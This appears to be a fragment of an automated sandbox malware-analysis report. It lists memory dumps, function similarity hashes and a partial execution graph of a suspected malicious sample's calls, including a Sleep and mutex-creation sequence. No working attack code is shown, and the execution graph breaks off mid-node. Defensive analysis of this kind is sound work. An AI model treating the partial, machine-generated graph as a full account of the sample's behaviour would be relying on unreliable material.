                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                                                                                                    • String ID: @2
                                                                                                                                                                                                                                                    • API String ID: 3213747228-3701443097
                                                                                                                                                                                                                                                    • Opcode ID: ee153b33f3398201b26c3dfb3095f2f3fd1ef45e8d267d915f872b587d07e196
                                                                                                                                                                                                                                                    • Instruction ID: a1ca0ab840beaf949341eac9f0c7e4e53b3bc324f0acffb39d8ae7e8ef48064f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee153b33f3398201b26c3dfb3095f2f3fd1ef45e8d267d915f872b587d07e196
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17B127329042859FEB11CF28C8417BEBBF5EF56360F1481AAE455EB382D7399D41CB60
                                                                                                                                                                                                                                                    Function 00AA70C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _wcsrchr
                                                                                                                                                                                                                                                    • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                                    • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                                    • Opcode ID: f190141fab10e215728b85e991191a8999fbcb0024b7856a6f5472c392137bea
                                                                                                                                                                                                                                                    • Instruction ID: 15b8034fc00991ce00897939bd24c05a5799eca99d983457034cb0ee3a3c27fd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f190141fab10e215728b85e991191a8999fbcb0024b7856a6f5472c392137bea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6301D63761871626662865199D02B7F1BDCAB83BB472A012FF944FB3C3EF45DC0282A0
                                                                                                                                                                                                                                                    Function 00A8BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1732406202.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732390190.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732406202.0000000000AD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732463663.0000000000AD9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732478069.0000000000ADB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732493623.0000000000AE5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732507148.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732524268.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732621041.0000000000C38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732639616.0000000000C3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732664662.0000000000C5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732705771.0000000000C7A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732721135.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732743268.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732760419.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732773660.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732787072.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732803902.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732820754.0000000000CA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732843478.0000000000CBD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732857659.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732871155.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732888711.0000000000CC5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732906068.0000000000CD3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732921246.0000000000CD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732935215.0000000000CD6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732952572.0000000000CDA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732970500.0000000000CF1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732984355.0000000000CF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1732997444.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733012172.0000000000CF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733025995.0000000000CF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733040856.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733054197.0000000000CFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733067117.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733081035.0000000000D06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D08000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733095113.0000000000D46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733143852.0000000000D74000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733158350.0000000000D76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733172145.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733188027.0000000000D7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733202134.0000000000D7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733216820.0000000000D8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1733235480.0000000000D8E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a70000_ebjtOH70jl.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 531285432-0
                                                                                                                                                                                                                                                    • Opcode ID: 5e766a25db252ded7417d267bea6de068fce68df3501da113cc9c767f82abae4
                                                                                                                                                                                                                                                    • Instruction ID: 5d860cff547baab91becded3cdc0bb8aa73ba445b12da3f169f052e7afa90289
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e766a25db252ded7417d267bea6de068fce68df3501da113cc9c767f82abae4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7212F71A012199FDF14FFA4DD45DAEBBB8EF48724F100065F601A7251DB34AD018FA1

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:0.9%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:571
                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                                                    execution_graph 9991 672060 9994 68c5bb 9991->9994 9993 67206c 9997 68c305 9994->9997 9996 68c5cb 9996->9993 9998 68c31b 9997->9998 9999 68c311 9997->9999 9998->9996 10000 68c2ce 9999->10000 10001 68c2ee 9999->10001 10000->9998 10006 68cc05 10000->10006 10010 68cc3a 10001->10010 10003 68c300 10003->9996 10007 68c2e7 10006->10007 10008 68cc13 InitializeCriticalSectionEx 10006->10008 10007->9996 10008->10007 10011 68cc4f RtlInitializeConditionVariable 10010->10011 10011->10003 10250 6aba2d 10251 6aba57 10250->10251 10253 6aba3d __cftof __dosmaperr 10250->10253 10252 6a683a __cftof 3 API calls 10251->10252 10251->10253 10252->10253 10427 6740e0 10428 67412a 10427->10428 10430 674172 std::invalid_argument::invalid_argument 10428->10430 10431 673ea0 10428->10431 10432 673ede 10431->10432 10433 673f08 10431->10433 10432->10430 10434 673f18 10433->10434 10437 672bc0 10433->10437 10434->10430 10438 672bce 10437->10438 10444 68b777 10438->10444 10440 672c02 10441 672c09 10440->10441 10450 672c40 10440->10450 10441->10430 10443 672c18 Concurrency::cancel_current_task 10445 68b784 10444->10445 10449 68b7a3 Concurrency::details::_Reschedule_chore 10444->10449 10453 68caa7 10445->10453 10447 68b794 10447->10449 10455 68b74e 10447->10455 10449->10440 10461 68b72b 10450->10461 10452 672c72 shared_ptr 10452->10443 10454 68cac2 CreateThreadpoolWork 10453->10454 10454->10447 10456 68b757 Concurrency::details::_Reschedule_chore 10455->10456 10459 68ccfc 10456->10459 10458 68b771 10458->10449 10460 68cd11 TpPostWork 10459->10460 10460->10458 10462 68b747 10461->10462 10463 68b737 10461->10463 10462->10452 10463->10462 10465 68c9a8 10463->10465 10466 68c9bd TpReleaseWork 10465->10466 10466->10462 10629 673fa0 10630 673fe2 10629->10630 10631 674092 10630->10631 10632 67404c 10630->10632 10635 673ff5 std::invalid_argument::invalid_argument 10630->10635 10633 673ea0 3 API calls 10631->10633 10636 6735a0 10632->10636 10633->10635 10637 6735d6 10636->10637 10641 67360e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 10637->10641 10642 672ca0 10637->10642 10639 67365e 10640 672bc0 3 API calls 10639->10640 10639->10641 10640->10641 10641->10635 10643 672cdd 10642->10643 10644 68be0f InitOnceExecuteOnce 10643->10644 10645 672d06 10644->10645 10646 672d11 std::invalid_argument::invalid_argument 10645->10646 10647 672d48 10645->10647 10651 68be27 10645->10651 10646->10639 10649 672400 3 API calls 10647->10649 10650 672d5b 10649->10650 10650->10639 10652 68be33 Concurrency::cancel_current_task 10651->10652 10653 68be9a 10652->10653 10654 68bea3 10652->10654 10658 68bdaf 10653->10658 10656 672aa0 4 API calls 10654->10656 10657 68be9f 10656->10657 10657->10647 10659 68cb61 InitOnceExecuteOnce 10658->10659 10660 68bdc7 10659->10660 10661 68bdce 10660->10661 10662 6a6beb 3 API calls 10660->10662 10661->10657 10663 68bdd7 10662->10663 10663->10657 10600 6799e8 10602 6799fc 10600->10602 10603 679a38 10602->10603 10604 675b20 3 API calls 10603->10604 10605 679aac 10604->10605 10606 678a60 3 API calls 10605->10606 10607 679abd 10606->10607 10608 675b20 3 API calls 10607->10608 10609 679be1 10608->10609 10610 678a60 3 API calls 10609->10610 10611 679bf2 10610->10611 10258 674236 10259 6723d0 4 API calls 10258->10259 10260 67423f 10259->10260 10012 679e74 10013 679e7c shared_ptr 10012->10013 10014 67a883 Sleep CreateMutexA 10013->10014 10016 679f4f shared_ptr 10013->10016 10015 67a8be 10014->10015 10017 674270 10020 673a80 10017->10020 10019 67427b shared_ptr 10021 673ab9 10020->10021 10024 673bf8 10021->10024 10025 673af9 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10021->10025 10030 673290 10021->10030 10022 673290 5 API calls 10027 673c1f 10022->10027 10024->10022 10024->10027 10025->10019 10026 673c28 10026->10019 10027->10026 10047 6737d0 10027->10047 10051 68c5dc 10030->10051 10033 6732d4 10034 6732fc __Mtx_unlock 10033->10034 10054 68c19a 10033->10054 10035 68c19a 4 API calls 10034->10035 10039 673310 std::invalid_argument::invalid_argument 10034->10039 10036 673337 10035->10036 10037 68c5dc GetSystemTimePreciseAsFileTime 10036->10037 10038 67336f 10037->10038 10040 68c19a 4 API calls 10038->10040 10041 673376 10038->10041 10039->10024 10040->10041 10042 68c19a 4 API calls 10041->10042 10043 673397 __Mtx_unlock 10041->10043 10042->10043 10044 68c19a 4 API calls 10043->10044 10045 6733ab 10043->10045 10046 6733ce 10044->10046 10045->10024 10046->10024 10048 6737dc 10047->10048 10127 672400 10048->10127 10058 68c382 10051->10058 10053 68c5e9 10053->10033 10055 68c1c2 10054->10055 10056 68c1a4 10054->10056 10055->10055 10056->10055 10075 68c1c7 10056->10075 10059 68c3d8 10058->10059 10061 68c3aa std::invalid_argument::invalid_argument 10058->10061 10059->10061 10064 68ce9b 10059->10064 10061->10053 10062 68c42d __Xtime_diff_to_millis2 10062->10061 10063 68ce9b _xtime_get GetSystemTimePreciseAsFileTime 10062->10063 10063->10062 10065 68ceaa 10064->10065 10067 68ceb7 __aulldvrm 10064->10067 10065->10067 10068 68ce74 10065->10068 10067->10062 10071 68cb1a 10068->10071 10072 68cb2b GetSystemTimePreciseAsFileTime 10071->10072 10074 68cb37 10071->10074 10072->10074 10074->10067 10078 672aa0 10075->10078 10077 68c1de Concurrency::cancel_current_task 10089 68be0f 10078->10089 10080 672abf 10080->10077 10081 672ab4 __dosmaperr 10081->10080 10092 6aa531 10081->10092 10103 68cb61 10089->10103 10093 6aa53b __dosmaperr ___free_lconv_mon 10092->10093 10094 6a6bfc 10093->10094 10095 6a8aaf __cftof 3 API calls 10093->10095 10097 6a8aaf 10094->10097 10096 6aa5ed 10095->10096 10098 6a8ab4 __cftof 10097->10098 10101 6a8abf __cftof 10098->10101 10107 6ad4f4 10098->10107 10121 6a651d 10101->10121 10104 68cb6f InitOnceExecuteOnce 10103->10104 10106 68be22 10103->10106 10104->10106 10106->10081 10109 6ad500 __cftof __dosmaperr 10107->10109 10108 6ad55c __cftof __dosmaperr 10108->10101 10109->10108 10110 6ad6db __dosmaperr 10109->10110 10111 6ad5e6 10109->10111 10115 6ad611 __cftof 10109->10115 10112 6a651d __cftof 3 API calls 10110->10112 10111->10115 10124 6ad4eb 10111->10124 10113 6ad6ee 10112->10113 10114 6ad665 10114->10108 10120 6aa531 __cftof 3 API calls 10114->10120 10115->10108 10115->10114 10118 6aa531 __cftof 3 API calls 10115->10118 10118->10114 10119 6ad4eb __cftof 3 API calls 10119->10115 10120->10108 10122 6a63f7 __cftof 3 API calls 10121->10122 10123 6a652e 10122->10123 10125 6aa531 __cftof 3 API calls 10124->10125 10126 6ad4f0 10125->10126 10126->10119 10130 68b506 10127->10130 10129 672432 10131 68b521 Concurrency::cancel_current_task 10130->10131 10132 68b588 __cftof std::invalid_argument::invalid_argument 10131->10132 10133 6a8aaf __cftof 3 API calls 10131->10133 10132->10129 10134 68b5cf 10133->10134 10502 6788b0 10504 678a1a 10502->10504 10505 678908 shared_ptr 10502->10505 10503 675b20 3 API calls 10503->10505 10505->10503 10505->10504 10578 672130 10581 68c62c 10578->10581 10580 67213a 10582 68c63c 10581->10582 10584 68c654 10581->10584 10582->10584 10585 68ceee 10582->10585 10584->10580 10586 68cc05 __Mtx_init_in_situ InitializeCriticalSectionEx 10585->10586 10587 68cf00 10586->10587 10587->10582 10588 673930 10589 68c5bb __Mtx_init_in_situ 2 API calls 10588->10589 10590 673967 10589->10590 10591 68c5bb __Mtx_init_in_situ 2 API calls 10590->10591 10592 6739a6 10591->10592 10674 6743b0 10675 68be0f InitOnceExecuteOnce 10674->10675 10676 6743ca 10675->10676 10677 6743d1 10676->10677 10678 6a6beb 3 API calls 10676->10678 10679 6743e4 10678->10679 10680 675bbd 10682 675bbf __cftof 10680->10682 10681 675c27 shared_ptr std::invalid_argument::invalid_argument 10682->10681 10683 675b20 3 API calls 10682->10683 10684 67667c 10683->10684 10685 675b20 3 API calls 10684->10685 10686 676681 10685->10686 10687 672280 3 API calls 10686->10687 10688 676699 shared_ptr 10687->10688 10689 675b20 3 API calls 10688->10689 10690 67670d 10689->10690 10691 672280 3 API calls 10690->10691 10693 676727 shared_ptr 10691->10693 10692 675b20 3 API calls 10692->10693 10693->10692 10694 672280 3 API calls 10693->10694 10695 676822 shared_ptr std::invalid_argument::invalid_argument 10693->10695 10694->10693 10560 6a6974 10561 6a698c 10560->10561 10563 6a6982 10560->10563 10562 6a68bd 3 API calls 10561->10562 10564 6a69a6 ___free_lconv_mon 10562->10564 10612 68cff7 10613 68d007 10612->10613 10614 68d0af 10613->10614 10615 68d0ab RtlWakeAllConditionVariable 10613->10615 10261 673c07 10262 673c11 10261->10262 10264 673290 5 API calls 10262->10264 10265 673c1f 10262->10265 10263 673c28 10264->10265 10265->10263 10266 6737d0 3 API calls 10265->10266 10267 673c9b 10266->10267 9970 67a786 9971 67a7c2 shared_ptr 9970->9971 9973 67a7a0 9970->9973 9972 67a883 Sleep CreateMutexA 9974 67a8be 9972->9974 9973->9971 9973->9972 10522 672080 10523 68c5bb __Mtx_init_in_situ 2 API calls 10522->10523 10524 67208c 10523->10524 10525 672e80 10526 672ec6 10525->10526 10530 672f2f 10525->10530 10527 68c5dc GetSystemTimePreciseAsFileTime 10526->10527 10528 672ed2 10527->10528 10531 672fde 10528->10531 10534 672edd __Mtx_unlock 10528->10534 10529 672faf 10530->10529 10536 68c5dc GetSystemTimePreciseAsFileTime 10530->10536 10532 68c19a 4 API calls 10531->10532 10533 672fe4 10532->10533 10535 68c19a 4 API calls 10533->10535 10534->10530 10534->10533 10537 672f79 10535->10537 10536->10537 10538 68c19a 4 API calls 10537->10538 10539 672f80 __Mtx_unlock 10537->10539 10538->10539 10540 68c19a 4 API calls 10539->10540 10541 672f98 10539->10541 10540->10541 10541->10529 10542 68c19a 4 API calls 10541->10542 10543 672ffc 10542->10543 10544 68c5dc GetSystemTimePreciseAsFileTime 10543->10544 10548 673040 shared_ptr __Mtx_unlock 10544->10548 10545 67311f 10546 68c19a 4 API calls 10545->10546 10550 673191 10545->10550 10552 673153 __Mtx_unlock 10545->10552 10547 67318b 10546->10547 10549 68c19a 4 API calls 10547->10549 10548->10545 